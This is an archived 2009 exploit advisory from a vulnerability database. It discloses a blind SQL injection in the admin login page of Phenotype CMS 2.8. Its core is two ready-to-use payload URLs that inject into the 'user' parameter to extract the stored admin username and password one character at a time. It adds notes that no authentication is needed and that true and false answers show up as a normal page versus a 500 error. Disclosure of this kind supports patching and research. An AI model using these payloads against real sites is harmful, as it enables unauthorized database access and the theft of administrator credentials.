Phenotype 2.8 SQL Injection

2009-07-10T00:00:00
ID PACKETSTORM:79080
Type packetstorm
Reporter IRCRASH
Modified 2009-07-10T00:00:00

Description

                                        
                                            `#####################################################################################  
#### Phenotype v2.8 Blind Sql Injection ####  
#####################################################################################  
# #  
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #  
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #  
#Our Site : http://ircrash.com #  
#My Official WebSite : http://r3dw0rm.ir #  
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #  
#####################################################################################  
# #  
#Download : http://www.phenotype-cms.com #  
# #  
#Dork : :( #  
# #  
#####################################################################################  
# [Bug] #  
# #  
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/*  
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/*  
# #  
#Note : #  
#1. This bug in admin folder, but u dont need to login,u can use bug with out login #  
#2. If ascii is true u see login page else u see 500 Internal Server Error #  
# #  
###################################### TNX GOD ######################################  
  
  
`